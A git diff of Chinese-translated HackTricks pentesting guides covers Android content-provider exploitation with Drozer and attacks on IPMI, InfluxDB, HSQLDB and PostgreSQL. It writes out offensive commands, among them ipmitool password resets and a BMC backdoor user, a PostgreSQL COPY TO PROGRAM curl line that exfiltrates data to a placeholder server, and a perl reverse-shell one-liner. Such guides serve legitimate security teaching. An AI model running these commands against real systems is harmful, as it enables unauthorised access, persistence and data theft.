src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
View File

@ -1,14 +1,12 @@
# 利用内容提供者
## 利用内容提供者
# Exploiting Content Providers
{{#include ../../../banners/hacktricks-training.md}}
## 介绍
## Intro
数据是通过一个称为 **content provider** 的组件根据请求从一个应用程序提供给其他应用程序的。这些请求通过 **ContentResolver class** 方法进行管理。内容提供者可以将其数据存储在各种位置,例如 **数据库**、**文件** 或通过 **网络**
数据是通过一个称为 **content provider** 的组件在一个应用程序与其他应用程序之间 **按请求提供** 的。这些请求通过 **ContentResolver class** 方法进行管理。内容提供者可以将其数据存储在各种位置,例如 **数据库**、**文件** 或通过 **网络**
_Manifest.xml_ 文件中,需要声明内容提供者。例如:
_Manifest.xml_ 文件中,内容提供者的声明是必需的。例如:
```xml
<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
@ -40,7 +38,7 @@ Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
```
通过以“_content://_”开头的 URI可以拼凑出如何到达 **DBContentProvider**。这种方法基于使用 Drozer 获得的见解,其中关键信息位于 _/Keys_ 目录中。
可以通过以“_content://_”开头的 URI 来拼凑出如何到达 **DBContentProvider**。这种方法基于使用 Drozer 获得的见解,其中关键信息位于 _/Keys_ 目录中。
Drozer 可以 **猜测并尝试多个 URI**
```
@ -64,12 +62,12 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/
查询将类似于: `content://name.of.package.class/declared_name`
## **数据库支持的内容提供者**
## **数据库支持的 Content Providers**
大多数内容提供者可能用作 **数据库****接口**。因此,如果您可以访问它,您将能够 **提取、更新、插入和删除** 信息。\
大多数 Content Providers 可能用作 **数据库****接口**。因此,如果您可以访问它,您可能能够 **提取、更新、插入和删除** 信息。\
检查您是否可以 **访问敏感信息** 或尝试更改它以 **绕过授权** 机制。
在检查内容提供者的代码时 **还要查看** 名为: _query, insert, update 和 delete_**函数**
检查 Content Provider 代码时 **还要查看** 名称类似于_query, insert, update 和 delete_**函数**
![](<../../../images/image (887).png>)
@ -87,7 +85,7 @@ password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com
```
### 插入内容
### Insert content
查询数据库后,您将了解**列的名称**,然后,您可以在数据库中插入数据:
@ -97,20 +95,20 @@ email: incognitoguy50@gmail.com
_请注意在插入和更新中您可以使用 --string 来表示字符串,--double 来表示双精度,--float--integer--long--short--boolean_
### 更新内容
### Update content
知道列的名称后,您还可以**修改条目**
![](<../../../images/image (780).png>)
### 删除内容
### Delete content
![](<../../../images/image (423).png>)
### **SQL 注入**
### **SQL Injection**
通过操纵传递给内容提供者的**投影**和**选择字段**,测试 SQL 注入 **(SQLite)** 是很简单的。\
查询内容提供者时有两个有趣的参数可以搜索信息_--selection_ 和 _--projection_
通过操纵传递给内容提供者的**投影**和**选择字段**,测试 SQL 注入**SQLite**是简单的。\
查询内容提供者时有两个有趣的参数可以搜索信息_--selection_ 和 _--projection_
![](<../../../images/image (784).png>)
@ -162,7 +160,7 @@ dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc
```
### **路径遍历**
如果您可以访问文件,您可以尝试利用路径遍历(在这种情况下,这不是必需但您可以尝试使用“_../_”和类似的技巧
如果您可以访问文件,您可以尝试利用路径遍历(在这种情况下这不是必要但您可以尝试使用“_../_”和类似的技巧
```
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost

31
src/network-services-pentesting/623-udp-ipmi.md
View File

@ -1,23 +1,20 @@
# 623/UDP/TCP - IPMI
## 623/UDP/TCP - IPMI
{{#include ../banners/hacktricks-training.md}}
## 基本信息
### **IPMI 概述**
**[智能平台管理接口 (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** 提供了一种标准化的方法,用于远程管理和监控计算机系统,独立于操作系统或电源状态。该技术允许系统管理员远程管理系统,即使在系统关闭或无响应时,特别适用于:
**[智能平台管理接口 (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** 提供了一种标准化的方法,用于远程管理和监控计算机系统,独立于操作系统或电源状态。该技术允许系统管理员远程管理系统,即使在系统关闭或无响应时也能进行管理,特别适用于:
- 操作系统启动前的配置
- 关机管理
- 从系统故障中恢复
IPMI 能够监控温度、电压、风扇速度和电源,同时提供库存信息、查看硬件日志,并通过 SNMP 发送警报。其操作所需的基本条件是电源和 LAN 连接。
IPMI 能够监控温度、电压、风扇速度和电源,同时提供库存信息、查看硬件日志,并通过 SNMP 发送警报。其操作所需的基本条件是电源和局域网连接。
自 1998 年英特尔推出以来IPMI 得到了众多厂商的支持,增强了远程管理能力,特别是 2.0 版本对串行 LAN 的支持。关键组件包括:
自 1998 年英特尔推出以来IPMI 得到了众多厂商的支持,增强了远程管理能力,特别是 2.0 版本对串行通过 LAN 的支持。关键组件包括:
- **主板管理控制器 (BMC)** IPMI 操作的主要微控制器。
- **通信总线和接口:** 用于内部和外部通信,包括 ICMB、IPMB 和各种本地及网络连接接口。
@ -40,17 +37,17 @@ use auxiliary/scanner/ipmi/ipmi_version
use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10
```
### IPMI 漏洞
### IPMI Vulnerabilities
IPMI 2.0 领域Dan Farmer 发现了一个重大安全缺陷,通过 **cipher type 0** 暴露了一个漏洞。这个漏洞在 [Dan Farmer's research](http://fish2.com/ipmi/cipherzero.html) 中有详细记录,允许在目标有效用户的情况下,使用任何密码进行未经授权的访问。这个弱点在 HP、Dell Supermicro 等制造商的各种 BMC 中被发现,表明所有 IPMI 2.0 实现中存在广泛的问题。
IPMI 2.0领域Dan Farmer发现了一个重大安全漏洞通过**cipher type 0**暴露了一个漏洞。这个漏洞在[Dan Farmer's research](http://fish2.com/ipmi/cipherzero.html)中有详细记录允许在目标有效用户的情况下使用任何密码进行未经授权的访问。这个弱点在HP、Dell和Supermicro等制造商的各种BMC中被发现表明所有IPMI 2.0实现中存在广泛的问题。
### **通过 Cipher 0 绕过 IPMI 认证**
### **IPMI Authentication Bypass via Cipher 0**
要检测此缺陷,可以使用以下 Metasploit 辅助扫描器:
要检测这个缺陷可以使用以下Metasploit辅助扫描器:
```bash
use auxiliary/scanner/ipmi/ipmi_cipher_zero
```
利用这个漏洞可以通过 `ipmitool` 实现,如下所示,允许列出和修改用户密码:
利用这个漏洞可以使用 `ipmitool`实现,如下所示,允许列出和修改用户密码:
```bash
apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
@ -58,7 +55,7 @@ ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123
```
### **IPMI 2.0 RAKP 认证远程密码哈希检索**
此漏洞允许检索任何现有用户名的盐哈希密码MD5 和 SHA1。要测试此漏洞Metasploit 提供了一个模块:
此漏洞允许检索任何现有用户名的盐哈希密码MD5 和 SHA1。要测试此漏洞Metasploit 提供了一个模块:
```bash
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
```
@ -83,19 +80,19 @@ msf> use exploit/multi/upnp/libupnp_ssdp_overflow
```
### 暴力破解
**HP 在制造过程中随机其** **集成灯光控制 (iLO)** **产品的默认密码**。这一做法与其他制造商形成对比,后者往往使用**静态默认凭据**。以下是各种产品的默认用户名和密码的总结:
**HP 在制造过程中随机生成其** **集成灯光控制 (iLO)** **产品的默认密码**。这一做法与其他制造商形成对比,后者往往使用**静态默认凭据**。以下是各种产品的默认用户名和密码的总结:
- **HP 集成灯光控制 (iLO)** 使用**工厂随机化的 8 字符串**作为其默认密码,展示了更高的安全级别。
- **HP 集成灯光控制 (iLO)** 使用**工厂随机生成的 8 个字符的字符串**作为其默认密码,展示了更高的安全级别。
- 像**戴尔的 iDRAC、IBM 的 IMM**和**富士通的集成远程管理控制器**等产品使用易于猜测的密码如“calvin”、“PASSW0RD”带零和“admin”。
- 同样,**Supermicro IPMI (2.0)、Oracle/Sun ILOM**和**ASUS iKVM BMC**也使用简单的默认凭据其中“ADMIN”、“changeme”和“admin”作为它们的密码。
- 同样,**Supermicro IPMI (2.0)、Oracle/Sun ILOM**和**华硕 iKVM BMC**也使用简单的默认凭据其中“ADMIN”、“changeme”和“admin”作为它们的密码。
## 通过 BMC 访问主机
对基板管理控制器 (BMC) 的管理访问打开了访问主机操作系统的各种途径。一种简单的方法是利用 BMC 的键盘、视频、鼠标 (KVM) 功能。这可以通过重启主机到 GRUB 的根 shell使用 `init=/bin/sh`)或从设置为救援磁盘的虚拟 CD-ROM 启动来完成。这些方法允许直接操作主机的磁盘,包括插入后门、数据提取或进行安全评估所需的任何操作。然而,这需要重启主机,这是一个显著的缺点。在不重启的情况下,访问正在运行的主机更为复杂,并且因主机的配置而异。如果主机的物理或串行控制台保持登录状态,可以通过 BMC 的 KVM 或串行通过 LAN (sol) 功能轻松接管,使用 `ipmitool`。探索共享硬件资源的利用,如 i2c 总线和超级 I/O 芯片,是一个需要进一步研究的领域。
对基板管理控制器 (BMC) 的管理访问打开了访问主机操作系统的各种途径。一种简单的方法是利用 BMC 的键盘、视频、鼠标 (KVM) 功能。这可以通过重启主机到根 shell使用 `init=/bin/sh`)或从设置为救援磁盘的虚拟 CD-ROM 启动来完成。这些方法允许直接操作主机的磁盘,包括插入后门、数据提取或进行安全评估所需的任何操作。然而,这需要重启主机,这是一个显著的缺点。在不重启的情况下,访问正在运行的主机更为复杂,并且因主机的配置而异。如果主机的物理或串行控制台保持登录状态,可以通过 BMC 的 KVM 或串行通过 LAN (sol) 功能轻松接管,使用 `ipmitool`。探索共享硬件资源的利用,如 i2c 总线和超级 I/O 芯片,是一个需要进一步研究的领域。
## 从主机向 BMC 引入后门
在攻陷一台配备 BMC 的主机后,**可以利用本地 BMC 接口插入后门用户账户**,在服务器上创建持久存在。这一攻击需要在被攻陷的主机上存在**`ipmitool`**并激活 BMC 驱动程序支持。以下命令展示了如何通过主机的本地接口将新用户账户注入 BMC从而绕过身份验证的需要。这一技术适用于包括 Linux、Windows、BSD 甚至 DOS 在内的广泛操作系统。
在攻陷配备 BMC 的主机后,可以利用**本地 BMC 接口插入后门用户帐户**,在服务器上创建持久存在。这一攻击需要在被攻陷的主机上存在**`ipmitool`**并激活 BMC 驱动程序支持。以下命令展示了如何通过主机的本地接口将新用户帐户注入 BMC从而绕过身份验证的需要。这种技术适用于包括 Linux、Windows、BSD 甚至 DOS 在内的广泛操作系统。
```bash
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit

9
src/network-services-pentesting/8086-pentesting-influxdb.md
View File

@ -1,6 +1,5 @@
# 8086 - Pentesting InfluxDB
{{#include ../banners/hacktricks-training.md}}
## 基本信息
@ -24,11 +23,11 @@ InfluxDB 可能需要认证,也可能不需要。
influx -host 'host name' -port 'port #'
> use _internal
```
如果**遇到这样的错误**: `ERR: unable to parse authentication credentials`,这意味着它 **期望一些凭据**
如果您**遇到这样的错误**`ERR: unable to parse authentication credentials`,这意味着它**期望一些凭据**。
```
influx username influx password influx_pass
```
存在一个漏洞 influxdb允许绕过身份验证: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)
在 influxdb 中存在一个漏洞,允许绕过身份验证:[**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)
### 手动枚举
@ -47,7 +46,7 @@ _internal
```
#### 显示表/测量
The [**InfluxDB documentation**](https://docs.influxdata.com/influxdb/v1.2/introduction/getting_started/) 解释了 **measurements** 在 InfluxDB 中可以与 SQL 表平行。这些 **measurements** 的命名指示了它们各自的内容,每个都包含与特定实体相关的数据。
The [**InfluxDB documentation**](https://docs.influxdata.com/influxdb/v1.2/introduction/getting_started/) explains that **measurements** in InfluxDB can be paralleled with SQL tables. The nomenclature of these **measurements** is indicative of their respective content, each housing data relevant to a particular entity.
```bash
> show measurements
name: measurements
@ -97,7 +96,7 @@ time cpu host usage_guest usage_guest_nice usage_idle
1497018760000000000 cpu1 ubuntu 0 0 99.69909729188728 0 0 0 0 0 0.20060180541622202 0.10030090270811101
```
> [!WARNING]
> 在一些使用身份验证绕过的测试中注意到表的名称需要用双引号括起来,例如:`select * from "cpu"`
> 在一些使用身份验证绕过的测试中注意到表的名称需要用双引号括起来,例如:`select * from "cpu"`
### 自动化身份验证
```bash

28
src/network-services-pentesting/9001-pentesting-hsqldb.md
View File

@ -1,36 +1,36 @@
# 9001 - Pentesting HSQLDB
{{#include ../banners/hacktricks-training.md}}
# 基本信息
## 基本信息
**HSQLDB \([HyperSQL 数据库](http://hsqldb.org/)\)** 是领先的用 Java 编写的 SQL 关系数据库系统。它提供了一个小型、快速的多线程和事务性数据库引擎,具有内存和基于磁盘的表,并支持嵌入式和服务器模式。
**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** 是用Java编写的领先SQL关系数据库系统。它提供了一个小型、快速的多线程和事务性数据库引擎,具有内存和基于磁盘的表,并支持嵌入式和服务器模式。
**默认端口:** 9001
```text
9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
```
# 信息
## 默认设置
### 默认设置
请注意,默认情况下,此服务可能在内存中运行或绑定到本地主机。如果您找到了它,您可能利用了另一个服务并希望提升权限。
请注意,默认情况下,此服务可能在内存中运行或绑定到本地主机。如果您找到了它,您可能已经利用了另一个服务并希望提升权限。
默认凭据通常是 `sa`,密码为空。
如果您已经利用了另一个服务,请搜索可能的凭据
如果您已经利用了另一个服务,请搜索可能的凭据使用
```text
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
```
注意数据库名称 - 需要它来连接。
注意数据库名称 - 需要它来连接。
# 信息收集
## 信息收集
通过 [下载 HSQLDB](https://sourceforge.net/projects/hsqldb/files/) 并提取 `hsqldb/lib/hsqldb.jar` 来连接到数据库实例。使用 `java -jar hsqldb.jar` 运行 GUI 应用程序eww并使用发现的/弱的凭据连接到实例。
请注意,连接 URL 对于远程系统看起来像这样:`jdbc:hsqldb:hsql://ip/DBNAME`
请注意,连接 URL 对于远程系统看起来像这样: `jdbc:hsqldb:hsql://ip/DBNAME`
# 技巧
## 技巧
## Java 语言例程
### Java 语言例程
我们可以通过 HSQLDB 使用 Java 语言例程调用 Java 类的静态方法。请注意,被调用的类需要在应用程序的类路径中。
@ -38,7 +38,7 @@ JRTs 可以是 `functions` 或 `procedures`。如果 Java 方法返回一个或
如果我们想要调用的 Java 方法返回 void我们需要使用通过 `CALL` 语句调用的过程。
## 读取 Java 系统属性
### 读取 Java 系统属性
创建函数:
```text
@ -52,7 +52,7 @@ VALUES(getsystemproperty('user.name'))
```
您可以在此处找到[系统属性列表](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html)。
## 写入文件内容
### 写入文件内容
您可以使用位于 JDK 中的 `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java 小工具(自动加载到应用程序的类路径中)通过自定义过程将十六进制编码的项目写入磁盘。**注意最大大小为 1024 字节**。

99
src/network-services-pentesting/pentesting-postgresql.md
View File

@ -1,6 +1,5 @@
# 5432,5433 - Pentesting Postgresql
{{#include ../banners/hacktricks-training.md}}
## **基本信息**
@ -53,7 +52,7 @@ SELECT * FROM pg_extension;
\s
```
> [!WARNING]
> 如果运行 **`\list`** 发现一个名为 **`rdsadmin`** 的数据库,你就知道你在一个 **AWS postgresql 数据库** 内部。
> 如果运行 **`\list`** 发现一个名为 **`rdsadmin`** 的数据库,您就知道您在一个 **AWS postgresql 数据库** 内部。
有关 **如何滥用 PostgreSQL 数据库** 的更多信息,请查看:
@ -70,7 +69,7 @@ msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection
### **端口扫描**
根据[**这项研究**](https://www.exploit-db.com/papers/13084),当连接尝试失败时,`dblink` 会抛出一个 `sqlclient_unable_to_establish_sqlconnection` 异常,其中包含错误的解释。以下列出了这些细节的示例。
根据[**这项研究**](https://www.exploit-db.com/papers/13084),当连接尝试失败时,`dblink` 会抛出一个 `sqlclient_unable_to_establish_sqlconnection` 异常,包含错误的解释。以下列出了这些细节的示例。
```sql
SELECT * FROM dblink_connect('host=1.2.3.4
port=5678
@ -81,7 +80,7 @@ connect_timeout=10');
```
- 主机已关闭
`详细信息:无法连接到服务器:没有到主机的路由。服务器是否在主机 "1.2.3.4" 上运行并接受端口 5678 的 TCP/IP 连接?`
`DETAIL: 无法连接到服务器:没有到主机的路由 服务器是否在主机 "1.2.3.4" 上运行并接受端口 5678 的 TCP/IP 连接?`
- 端口已关闭
```
@ -102,7 +101,7 @@ DETAIL: FATAL: password authentication failed for user "name"
DETAIL: could not connect to server: Connection timed out Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
```
在 PL/pgSQL 函数中,目前无法获取异常详细信息。然而,如果您可以直接访问 PostgreSQL 服务器,您可以检索所需的信息。如果从系统表中提取用户名和密码不可行,您可以考虑利用前一节讨论的字典攻击方法,因为可能会产生积极的结果。
在 PL/pgSQL 函数中,目前无法获取异常详细信息。然而,如果您可以直接访问 PostgreSQL 服务器,您可以检索所需的信息。如果从系统表中提取用户名和密码不可行,您可以考虑利用前一节讨论的字典攻击方法,因为可能会产生积极的结果。
## 权限枚举
@ -113,14 +112,14 @@ running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
| rolsuper | 角色具有超级用户权限 |
| rolinherit | 角色自动继承其成员角色的权限 |
| rolcreaterole | 角色可以创建更多角色 |
| rolcreatedb | 角色可以创建数据库 |
| rolcreatedb | 角色可以创建数据库 |
| rolcanlogin | 角色可以登录。也就是说,这个角色可以作为初始会话授权标识符 |
| rolreplication | 角色是一个复制角色。复制角色可以启动复制连接并创建和删除复制槽。 |
| rolconnlimit | 对于可以登录的角色,这设置了该角色可以进行的最大并发连接数。-1 表示没有限制。 |
| rolpassword | 不是密码(始终显示为 `********` |
| rolconnlimit | 对于可以登录的角色,这设置了该角色可以建立的最大并发连接数。-1 表示没有限制。 |
| rolpassword | 不是密码(始终显示为 `********` |
| rolvaliduntil | 密码过期时间(仅用于密码认证);如果没有过期则为 null |
| rolbypassrls | 角色绕过每个行级安全策略,更多信息请参见 [Section 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html)。 |
| rolconfig | 角色特定的运行时配置变量默认值 |
| rolconfig | 角色特定的运行时配置变量默认值 |
| oid | 角色的 ID |
#### 有趣的组
@ -129,7 +128,7 @@ running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
- 如果您是 **`pg_read_server_files`** 的成员,您可以 **读取** 文件
- 如果您是 **`pg_write_server_files`** 的成员,您可以 **写入** 文件
> [!NOTE]
> [!TIP]
> 请注意,在 Postgres 中,**用户**、**组**和**角色**是 **相同** 的。这仅取决于 **您如何使用它** 以及您是否 **允许其登录**
```sql
# Get users roles
@ -212,7 +211,7 @@ SELECT * FROM pg_proc;
### 读取目录和文件
来自这个 [**commit** ](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) 的定义 **`DEFAULT_ROLE_READ_SERVER_FILES`** 组(称为 **`pg_read_server_files`**)和 **超级用户** 可以在任何路径上使用 **`COPY`** 方法(查看 `convert_and_check_filename``genfile.c`
来自这个 [**commit** ](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) 的信息,定义 **`DEFAULT_ROLE_READ_SERVER_FILES`** 组(称为 **`pg_read_server_files`**)和 **超级用户** 可以在任何路径上使用 **`COPY`** 方法(查看 `genfile.c` 中的 `convert_and_check_filename`
```sql
# Read file
CREATE TABLE demo(t text);
@ -252,7 +251,7 @@ SHOW data_directory;
GRANT pg_read_server_files TO username;
# Check CREATEROLE privilege escalation
```
您可以在 [https://www.postgresql.org/docs/current/functions-admin.html](https://www.postgresql.org/docs/current/functions-admin.html) 找到 **更多功能**。
您可以在 **[https://www.postgresql.org/docs/current/functions-admin.html](https://www.postgresql.org/docs/current/functions-admin.html)** 找到 **更多函数**。
### 简单文件写入
@ -284,7 +283,7 @@ copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/ju
### 通过本地文件写入更新 PostgreSQL 表数据
如果您拥有读取和写入 PostgreSQL 服务器文件的必要权限,您可以通过 **覆盖关联的文件节点** 来更新服务器上的任何表 [在 PostgreSQL 数据目录中](https://www.postgresql.org/docs/8.1/storage.html)。 **此技术的更多信息** [**在这里**](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users)。
如果您拥有读取和写入 PostgreSQL 服务器文件的必要权限,您可以通过 **覆盖关联的文件节点** 来更新服务器上的任何表 [在 PostgreSQL 数据目录中](https://www.postgresql.org/docs/8.1/storage.html)。 **关此技术的更多信息** [**在这里**](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users)。
所需步骤:
@ -294,7 +293,7 @@ copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/ju
SELECT setting FROM pg_settings WHERE name = 'data_directory';
```
**注意:** 如果您无法从设置中检索当前数据目录路径,可以通过 `SELECT version()` 查询获取主要 PostgreSQL 版本,并尝试暴力破解路径。 PostgreSQL 在 Unix 安装中的常见数据目录路径是 `/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/` 一个常见的集群名称是 `main`
**注意:** 如果您无法从设置中检索当前数据目录路径,可以通过 `SELECT version()` 查询获取主要 PostgreSQL 版本,并尝试暴力破解路径。 PostgreSQL 在 Unix 安装中的常见数据目录路径是 `/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/`。一个常见的集群名称是 `main`
2. 获取与目标表关联的文件节点的相对路径
@ -302,7 +301,7 @@ SELECT setting FROM pg_settings WHERE name = 'data_directory';
SELECT pg_relation_filepath('{TABLE_NAME}')
```
此查询应返回类似 `base/3/1337` 的内容。 磁盘上的完整路径将是 `$DATA_DIRECTORY/base/3/1337`,即 `/var/lib/postgresql/13/main/base/3/1337`
此查询应返回类似 `base/3/1337` 的内容。磁盘上的完整路径将是 `$DATA_DIRECTORY/base/3/1337`,即 `/var/lib/postgresql/13/main/base/3/1337`
3. 通过 `lo_*` 函数下载文件节点
@ -332,13 +331,13 @@ ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = '{TABLE_NAME}';
```
5. 使用 [PostgreSQL 文件节点编辑器](https://github.com/adeadfed/postgresql-filenode-editor) [编辑文件节点](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users);将所有 `rol*` 布尔标志设置为 1 以获得完全权限。
5. 使用 [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor) [编辑文件节点](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users);将所有 `rol*` 布尔标志设置为 1 以获得完全权限。
```bash
python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {DATATYPE_CSV_FROM_STEP_4} -m update -p 0 -i ITEM_ID --csv-data {CSV_DATA}
```
![PostgreSQL 文件节点编辑器演示](https://raw.githubusercontent.com/adeadfed/postgresql-filenode-editor/main/demo/demo_datatype.gif)
![PostgreSQL Filenode Editor Demo](https://raw.githubusercontent.com/adeadfed/postgresql-filenode-editor/main/demo/demo_datatype.gif)
6. 通过 `lo_*` 函数重新上传编辑过的文件节点,并覆盖磁盘上的原始文件
@ -347,7 +346,7 @@ SELECT lo_from_bytea(13338,decode('{BASE64_ENCODED_EDITED_FILENODE}','base64'))
SELECT lo_export(13338,'{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}')
```
7. _(可选)_ 通过运行一个昂贵的 SQL 查询清除内存中的表缓存
7. _(可选)_ 通过运行一个昂贵的 SQL 查询清除内存中的表缓存
```sql
SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea)
@ -361,7 +360,7 @@ SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea)
### **RCE 到程序**
自[ 版本 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html)以来,只有 **超级用户****`pg_execute_server_program`** 组的成员可以使用 copy 进行 RCE示例带有外泄
[9.3 版本](https://www.postgresql.org/docs/9.3/release-9-3.html),只有 **超级用户****`pg_execute_server_program`** 组的成员可以使用 copy 进行 RCE示例带有外泄
```sql
'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -
```
@ -406,10 +405,10 @@ COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::I
### PostgreSQL 配置文件 RCE
> [!NOTE]
> [!TIP]
> 以下 RCE 向量在受限 SQLi 上下文中特别有用,因为所有步骤都可以通过嵌套的 SELECT 语句执行
PostgreSQL 的 **配置文件****可写的**,由 **postgres 用户** 拥有,该用户正在运行数据库,因此作为 **超级用户**,您可以在文件系统中写入文件,因此您可以 **覆盖此文件。**
PostgreSQL 的 **配置文件****可写的**,由 **postgres 用户** 运行数据库,因此作为 **超级用户**,您可以在文件系统中写入文件,因此您可以 **覆盖此文件。**
![](<../images/image (322).png>)
@ -417,11 +416,11 @@ PostgreSQL 的 **配置文件** 是 **可写的**,由 **postgres 用户** 拥
有关此技术的更多信息 [在这里](https://pulsesecurity.co.nz/articles/postgres-sqli)。
配置文件有一些有趣的属性,可以导致 RCE
配置文件有一些有趣的属性,可以导致 RCE
- `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` 数据库私钥的路径
- `ssl_passphrase_command = ''` 如果私钥文件受到密码保护加密PostgreSQL 将 **执行此属性中指示的命令**
- `ssl_passphrase_command_supports_reload = off` **如果** 此属性为 **on**,则 **如果** 密钥受到密码保护,**将执行** 的 **命令** `pg_reload_conf()`**执行**执行
- `ssl_passphrase_command_supports_reload = off` **如果** 此属性为 **on**,则 **如果** 密钥受到密码保护,**将执行** 的 **命令**`pg_reload_conf()`**执行** 时。
然后,攻击者需要:
@ -435,7 +434,7 @@ PostgreSQL 的 **配置文件** 是 **可写的**,由 **postgres 用户** 拥
2. `ssl_passphrase_command_supports_reload = on`
6. 执行 `pg_reload_conf()`
在测试此时,我注意到这仅在 **私钥文件具有 640 权限** 时有效,且 **由 root 拥有**,并且由 **ssl-cert 或 postgres 组** 拥有(因此 postgres 用户可以读取),并且位于 _/var/lib/postgresql/12/main_
在测试时,我注意到这仅在 **私钥文件权限为 640** 时有效,且 **由 root 拥有**,并且由 **组 ssl-cert 或 postgres** 拥有(以便 postgres 用户可以读取),并放置在 _/var/lib/postgresql/12/main_
#### **使用 archive_command 的 RCE**
@ -443,7 +442,7 @@ PostgreSQL 的 **配置文件** 是 **可写的**,由 **postgres 用户** 拥
配置文件中另一个可利用的属性是 `archive_command`
为了使其工作,`archive_mode` 设置必须为 `'on'``'always'`。如果为真,则我们可以覆盖 `archive_command` 中的命令,并通过 WAL预写日志操作强制执行它。
为了使其工作,`archive_mode` 设置必须为 `'on'``'always'`。如果是真的,那么我们可以覆盖 `archive_command` 中的命令,并通过 WAL预写日志操作强制执行它。
一般步骤是:
@ -458,10 +457,10 @@ PostgreSQL 的 **配置文件** 是 **可写的**,由 **postgres 用户** 拥
此攻击向量利用以下配置变量:
- `session_preload_libraries` -- PostgreSQL 服务器在客户端连接时加载的库。
- `session_preload_libraries` -- PostgreSQL 服务器在客户端连接时加载的库。
- `dynamic_library_path` -- PostgreSQL 服务器将搜索库的目录列表。
我们可以将 `dynamic_library_path` 值设置为 `postgres` 用户可写的目录,例如 `/tmp/` 目录,并在其中上传恶意的 `.so` 对象。接下来,我们将通过将其包含在 `session_preload_libraries` 变量中,强制 PostgreSQL 服务器加载我们新上传的库。
我们可以将 `dynamic_library_path` 值设置为一个由运行数据库的 `postgres` 用户可写的目录,例如 `/tmp/` 目录,并在其中上传恶意的 `.so` 对象。接下来,我们将通过将其包含在 `session_preload_libraries` 变量中,强制 PostgreSQL 服务器加载我们新上传的库。
攻击步骤是:
@ -527,9 +526,9 @@ gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so
#### **授予**
根据 [**文档**](https://www.postgresql.org/docs/13/sql-grant.html)_拥有 **`CREATEROLE`** 权限的角色可以 **授予或撤销任何角色的成员资格**,该角色 **不是** 超级用户。_
根据 [**文档**](https://www.postgresql.org/docs/13/sql-grant.html)_拥有 **`CREATEROLE`** 权限的角色可以 **授予或撤销任何非超级用户角色的成员资格**。_
因此,如果您拥有 **`CREATEROLE`** 权限,您可以授予自己其他 **角色**(不是超级用户)的访问权限,这可以让您读取和写入文件并执行命令:
因此,如果您拥有 **`CREATEROLE`** 权限,您可以授予自己访问其他 **角色**(不是超级用户)的权限,这可以让您读取和写入文件并执行命令:
```sql
# Access to execute commands
GRANT pg_execute_server_program TO username;
@ -551,7 +550,7 @@ ALTER USER user_name WITH PASSWORD 'new_password';
```sql
COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';
```
> [!NOTE]
> [!TIP]
> 这通常是因为 **`pg_hba.conf`** 文件中的以下行:
>
> ```bash
@ -565,13 +564,13 @@ COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username>
### **ALTER TABLE privesc**
在 [**这篇文章**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) 中解释了如何在 Postgres GCP 中利用授予用户的 ALTER TABLE 权限实现 **privesc**
